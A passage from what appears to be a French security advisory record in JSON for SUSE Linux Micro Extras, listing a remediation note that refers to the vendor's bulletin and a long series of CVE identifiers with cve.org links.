"name": "SUSE Linux Micro Extras",
"vendor": {
"name": "SUSE",
"scada": false
}
}
}
],
"affected_systems_content": "",
"content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
"cves": [
{
"name": "CVE-2025-68234",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68234"
},
{
"name": "CVE-2025-71075",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71075"
},
{
"name": "CVE-2023-54076",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54076"
},
{
"name": "CVE-2026-23198",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23198"
},
{
"name": "CVE-2025-40273",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40273"
},
{
"name": "CVE-2023-53714",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53714"
},
{
"name": "CVE-2025-68230",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68230"
},
{
"name": "CVE-2026-23202",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23202"
},
{
"name": "CVE-2023-54149",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54149"
},
{
"name": "CVE-2025-71086",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71086"
},
{
"name": "CVE-2023-53797",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53797"
},
{
"name": "CVE-2023-53863",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53863"
},
{
"name": "CVE-2026-23167",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23167"
},
{
"name": "CVE-2025-22083",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22083"
},
{
"name": "CVE-2023-54142",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54142"
},
{
"name": "CVE-2025-68374",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68374"
},
{
"name": "CVE-2026-23129",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23129"
},
{
"name": "CVE-2023-54000",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54000"
},
{
"name": "CVE-2023-54052",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54052"
},
{
"name": "CVE-2025-68286",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68286"
},
{
"name": "CVE-2025-71094",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71094"
},
{
"name": "CVE-2025-68788",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68788"
},
{
"name": "CVE-2023-54091",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54091"
},
{
"name": "CVE-2023-54083",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54083"
},
{
"name": "CVE-2025-40314",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40314"
},
{
"name": "CVE-2025-40306",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40306"
},
{
"name": "CVE-2025-68778",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68778"
},
{
"name": "CVE-2023-53821",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53821"
},
{
"name": "CVE-2023-53799",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53799"
},
{
"name": "CVE-2026-23054",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23054"
},
{
"name": "CVE-2025-40254",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40254"
},
{
"name": "CVE-2025-71064",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71064"
},
{
"name": "CVE-2023-54201",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54201"
},
{
"name": "CVE-2025-40219",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40219"
},
{
"name": "CVE-2025-68200",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68200"
},
{
"name": "CVE-2025-68736",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68736"
},
{
"name": "CVE-2025-68725",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68725"
},
{
"name": "CVE-2025-68176",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68176"
},
{
"name": "CVE-2025-68204",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68204"
},
{
"name": "CVE-2025-68795",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68795"
},
{
"name": "CVE-2025-68349",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68349"
},
{
"name": "CVE-2025-68380",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68380"
},
{
"name": "CVE-2026-23269",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23269"
},
{
"name": "CVE-2023-54309",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54309"
},
{
"name": "CVE-2025-68283",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68283"
},
{
"name": "CVE-2025-68339",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68339"
},
{
"name": "CVE-2025-40287",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40287"
},
{
"name": "CVE-2026-23069",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23069"
},
{
"name": "CVE-2023-53995",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53995"
},
{
"name": "CVE-2026-22992",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22992"
},
{
"name": "CVE-2023-54255",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54255"
},
{
"name": "CVE-2026-23004",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23004"
},
{
"name": "CVE-2025-71071",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71071"
},
{
"name": "CVE-2023-54271",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54271"
},
{
"name": "CVE-2025-71191",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71191"
},
{
"name": "CVE-2025-68295",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68295"
},
{
"name": "CVE-2025-68728",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68728"
},
{
"name": "CVE-2025-71087",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71087"
},
{
"name": "CVE-2023-54297",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54297"
},
{
"name": "CVE-2023-54112",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54112"
},
{
"name": "CVE-2025-68287",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68287"
},
{
"name": "CVE-2025-40240",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40240"
},
{
"name": "CVE-2025-71135",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71135"
},
{
"name": "CVE-2025-40081",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40081"
},
{
"name": "CVE-2023-54313",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54313"
},
{
"name": "CVE-2023-53759",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53759"
},
{
"name": "CVE-2025-68746",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68746"
},
{
"name": "CVE-2025-68773",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68773"
},
{
"name": "CVE-2025-71133",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71133"
},
{
"name": "CVE-2023-53994",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53994"
},
{
"name": "CVE-2025-40153",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40153"
},
{
"name": "CVE-2025-40103",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40103"
},
{
"name": "CVE-2025-40312",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40312"
},
{
"name": "CVE-2023-54095",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54095"
},
{
"name": "CVE-2025-22125",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22125"
},
{
"name": "CVE-2025-21738",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21738"
},
{
"name": "CVE-2023-54143",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54143"
},
{
"name": "CVE-2025-68238",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68238"
},
{
"name": "CVE-2025-68297",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68297"
},
{
"name": "CVE-2023-53813",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53813"
},
{
"name": "CVE-2023-54227",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54227"
},
{
"name": "CVE-2026-23139",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23139"
},
{
"name": "CVE-2023-53855",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53855"
},
{
"name": "CVE-2026-23208",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23208"
},
{
"name": "CVE-2025-68804",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68804"
},
{
"name": "CVE-2026-23017",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23017"
},
{
"name": "CVE-2023-53864",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53864"
},
{
"name": "CVE-2025-40350",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40350"
},
{
"name": "CVE-2025-40309",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40309"
},
{
"name": "CVE-2025-71189",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71189"
},
{
"name": "CVE-2025-40349",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40349"
},
{
"name": "CVE-2023-54246",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54246"
},
{
"name": "CVE-2025-71088",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71088"
},
{
"name": "CVE-2026-23179",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23179"
},
{
"name": "CVE-2025-38243",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38243"
},
{
"name": "CVE-2025-40343",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40343"
},
{
"name": "CVE-2023-54001",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54001"
},
{
"name": "CVE-2026-23090",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23090"
},
{
"name": "CVE-2026-23035",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23035"
},
{
"name": "CVE-2023-54253",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54253"
},
{
"name": "CVE-2026-23210",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23210"
},
{
"name": "CVE-2025-38375",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38375"
},
{
"name": "CVE-2025-68307",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68307"
},
{
"name": "CVE-2025-40308",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40308"
},
{
"name": "CVE-2023-54324",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54324"
},
{
"name": "CVE-2023-54106",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54106"
},
{
"name": "CVE-2025-40187",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40187"
},
{
"name": "CVE-2025-40315",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40315"
},
{
"name": "CVE-2023-53793",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53793"
},
{
"name": "CVE-2023-54096",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54096"
},
{
"name": "CVE-2025-39913",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39913"
},
{
"name": "CVE-2026-23064",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23064"
},
{
"name": "CVE-2025-71098",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71098"
},
{
"name": "CVE-2025-40251",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40251"
},
{
"name": "CVE-2025-71078",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71078"
},
{
"name": "CVE-2025-40355",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40355"
},
{
"name": "CVE-2023-54283",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54283"
},
{
"name": "CVE-2023-54049",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54049"
},
{
"name": "CVE-2025-71083",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71083"
},
{
"name": "CVE-2023-54066",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54066"
},
{
"name": "CVE-2026-23061",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23061"
},
{
"name": "CVE-2023-54117",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54117"
},
{
"name": "CVE-2023-53999",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53999"
},
{
"name": "CVE-2023-54038",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54038"
},
{
"name": "CVE-2025-68813",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68813"
},
{
"name": "CVE-2023-54315",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54315"
},
{
"name": "CVE-2026-23135",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23135"
},
{
"name": "CVE-2025-39689",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39689"
},
{
"name": "CVE-2025-68365",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68365"
},
{
"name": "CVE-2023-54211",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54211"
},
{
"name": "CVE-2023-54251",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54251"
},
{
"name": "CVE-2026-23119",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23119"
},
{
"name": "CVE-2025-71085",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71085"
},
{
"name": "CVE-2023-54156",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54156"
},
{
"name": "CVE-2026-23173",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23173"
},
{
"name": "CVE-2026-23268",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23268"
},
{
"name": "CVE-2023-53750",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53750"
},
{
"name": "CVE-2025-40347",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40347"
},
{
"name": "CVE-2025-71154",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71154"
},
{
"name": "CVE-2023-54037",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54037"
},
{
"name": "CVE-2023-53815",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53815"
},
{
"name": "CVE-2026-23222",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23222"
},
{
"name": "CVE-2025-68257",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68257"
},
{
"name": "CVE-2025-71084",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71084"
},
{
"name": "CVE-2023-54031",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54031"
},
{
"name": "CVE-2026-23094",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23094"
},
{
"name": "CVE-2026-23049",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23049"
},
{
"name": "CVE-2025-40190",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40190"
},
{
"name": "CVE-2022-50756",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50756"
},
{
"name": "CVE-2023-53989",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53989"
},
{
"name": "CVE-2025-68347",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68347"
},
{
"name": "CVE-2025-68235",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68235"
},
{
"name": "CVE-2025-68770",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68770"
},
{
"name": "CVE-2026-23229",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23229"
},
{
"name": "CVE-2025-40202",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40202"
},
{
"name": "CVE-2025-40311",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40311"
},
{
"name": "CVE-2025-68814",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68814"
},
{
"name": "CVE-2023-54254",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54254"
},
{
"name": "CVE-2025-71081",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71081"
},
{
"name": "CVE-2023-54312",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54312"
},
{
"name": "CVE-2023-54094",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54094"
},
{
"name": "CVE-2026-23101",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23101"
},
{
"name": "CVE-2026-23099",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23099"
},
{
"name": "CVE-2025-40167",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40167"
},
{
"name": "CVE-2025-38159",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38159"
},
{
"name": "CVE-2023-53846",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53846"
},
{
"name": "CVE-2023-53792",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53792"
},
{
"name": "CVE-2023-54164",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54164"
},
{
"name": "CVE-2025-40256",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40256"
},
{
"name": "CVE-2026-22989",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22989"
},
{
"name": "CVE-2026-23085",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23085"
},
{
"name": "CVE-2025-40360",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40360"
},
{
"name": "CVE-2026-23209",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23209"
},
{
"name": "CVE-2025-71136",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71136"
},
{
"name": "CVE-2025-68354",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68354"
},
{
"name": "CVE-2025-68801",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68801"
},
{
"name": "CVE-2026-23150",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23150"
},
{
"name": "CVE-2023-54316",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54316"
},
{
"name": "CVE-2025-40097",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40097"
},
{
"name": "CVE-2025-68258",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68258"
},
{
"name": "CVE-2023-54089",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54089"
},
{
"name": "CVE-2026-23163",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23163"
},
{
"name": "CVE-2023-54016",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54016"
},
{
"name": "CVE-2025-71235",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71235"
},
{
"name": "CVE-2023-54035",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54035"
},
{
"name": "CVE-2025-40322",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40322"
},
{
"name": "CVE-2026-23057",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23057"
},
{
"name": "CVE-2025-68209",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68209"
},
{
"name": "CVE-2025-71138",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71138"
},
{
"name": "CVE-2025-40233",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40233"
},
{
"name": "CVE-2023-54322",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54322"
},
{
"name": "CVE-2023-54155",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54155"
},
{
"name": "CVE-2023-54088",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54088"
},
{
"name": "CVE-2026-23166",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23166"
},
{
"name": "CVE-2025-40271",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40271"
},
{
"name": "CVE-2023-54276",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54276"
},
{
"name": "CVE-2023-42752",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-42752"
},
{
"name": "CVE-2026-22991",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22991"
},
{
"name": "CVE-2023-54048",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54048"
},
{
"name": "CVE-2023-54278",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54278"
},
{
"name": "CVE-2023-54215",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54215"
},
{
"name": "CVE-2025-68308",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68308"
},
{
"name": "CVE-2023-53777",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53777"
},
{
"name": "CVE-2023-54133",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54133"
},
{
"name": "CVE-2025-40242",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40242"
},
{
"name": "CVE-2026-23116",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23116"
},
{
"name": "CVE-2023-54148",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54148"
},
{
"name": "CVE-2025-68190",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68190"
},
{
"name": "CVE-2023-54064",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54064"
},
{
"name": "CVE-2023-54153",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54153"
},
{
"name": "CVE-2026-23207",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23207"
},
{
"name": "CVE-2025-40252",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40252"
},
{
"name": "CVE-2025-71200",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71200"
},
{
"name": "CVE-2023-53791",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53791"
},
{
"name": "CVE-2025-68218",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68218"
},
{
"name": "CVE-2023-53848",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53848"
},
{
"name": "CVE-2025-68255",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68255"
},
{
"name": "CVE-2023-54081",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54081"
},
{
"name": "CVE-2023-53828",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53828"
},
{
"name": "CVE-2025-40024",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40024"
},
{
"name": "CVE-2026-23172",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23172"
},
{
"name": "CVE-2025-40238",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40238"
},
{
"name": "CVE-2023-54185",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54185"
},
{
"name": "CVE-2025-40277",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40277"
},
{
"name": "CVE-2025-37813",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37813"
},
{
"name": "CVE-2025-40106",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40106"
},
{
"name": "CVE-2025-68174",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68174"
},
{
"name": "CVE-2025-40272",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40272"
},
{
"name": "CVE-2026-23133",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23133"
},
{
"name": "CVE-2025-71093",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71093"
},
{
"name": "CVE-2026-23131",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23131"
},
{
"name": "CVE-2026-23170",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23170"
},
{
"name": "CVE-2025-68759",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68759"
},
{
"name": "CVE-2023-53834",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53834"
},
{
"name": "CVE-2026-23204",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23204"
},
{
"name": "CVE-2025-71188",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71188"
},
{
"name": "CVE-2025-40345",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40345"
},
{
"name": "CVE-2023-54170",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54170"
},
{
"name": "CVE-2026-23125",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23125"
},
{
"name": "CVE-2023-53781",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53781"
},
{
"name": "CVE-2025-40033",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40033"
},
{
"name": "CVE-2022-50453",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50453"
},
{
"name": "CVE-2024-42103",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42103"
},
{
"name": "CVE-2025-68733",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68733"
},
{
"name": "CVE-2026-23005",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23005"
},
{
"name": "CVE-2026-23214",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23214"
},
{
"name": "CVE-2025-7709",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-7709"
},
{
"name": "CVE-2025-68188",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68188"
},
{
"name": "CVE-2025-40269",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40269"
},
{
"name": "CVE-2025-68335",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68335"
},
{
"name": "CVE-2025-71079",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71079"
},
{
"name": "CVE-2023-54223",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54223"
},
{
"name": "CVE-2025-37861",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37861"
},
{
"name": "CVE-2026-23178",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23178"
},
{
"name": "CVE-2026-22997",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22997"
},
{
"name": "CVE-2025-39977",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39977"
},
{
"name": "CVE-2023-54045",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54045"
},
{
"name": "CVE-2025-68330",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68330"
},
{
"name": "CVE-2023-54101",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54101"
},
{
"name": "CVE-2025-71196",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71196"
},
{
"name": "CVE-2023-54179",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54179"
},
{
"name": "CVE-2025-68180",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68180"
},
{
"name": "CVE-2023-54289",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54289"
},
{
"name": "CVE-2023-54177",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54177"
},
{
"name": "CVE-2026-23191",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23191"
},
{
"name": "CVE-2026-23078",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23078"
},
{
"name": "CVE-2025-68201",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68201"
},
{
"name": "CVE-2025-40289",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40289"
},
{
"name": "CVE-2026-23169",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23169"
},
{
"name": "CVE-2025-68768",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68768"
},
{
"name": "CVE-2025-68785",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68785"
},
{
"name": "CVE-2025-71130",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71130"
},
{
"name": "CVE-2023-54013",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54013"
},
{
"name": "CVE-2025-68808",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68808"
},
{
"name": "CVE-2024-27005",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27005"
},
{
"name": "CVE-2025-68223",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68223"
},
{
"name": "CVE-2025-68783",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68783"
},
{
"name": "CVE-2025-40292",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40292"
},
{
"name": "CVE-2025-71147",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71147"
},
{
"name": "CVE-2023-54093",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54093"
},
{
"name": "CVE-2023-53839",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53839"
},
{
"name": "CVE-2023-53752",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53752"
},
{
"name": "CVE-2023-53802",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53802"
},
{
"name": "CVE-2025-38224",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38224"
},
{
"name": "CVE-2025-68724",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68724"
},
{
"name": "CVE-2023-54318",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54318"
},
{
"name": "CVE-2026-23074",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23074"
},
{
"name": "CVE-2025-71126",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71126"
},
{
"name": "CVE-2025-71199",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71199"
},
{
"name": "CVE-2025-68252",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68252"
},
{
"name": "CVE-2023-54166",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54166"
},
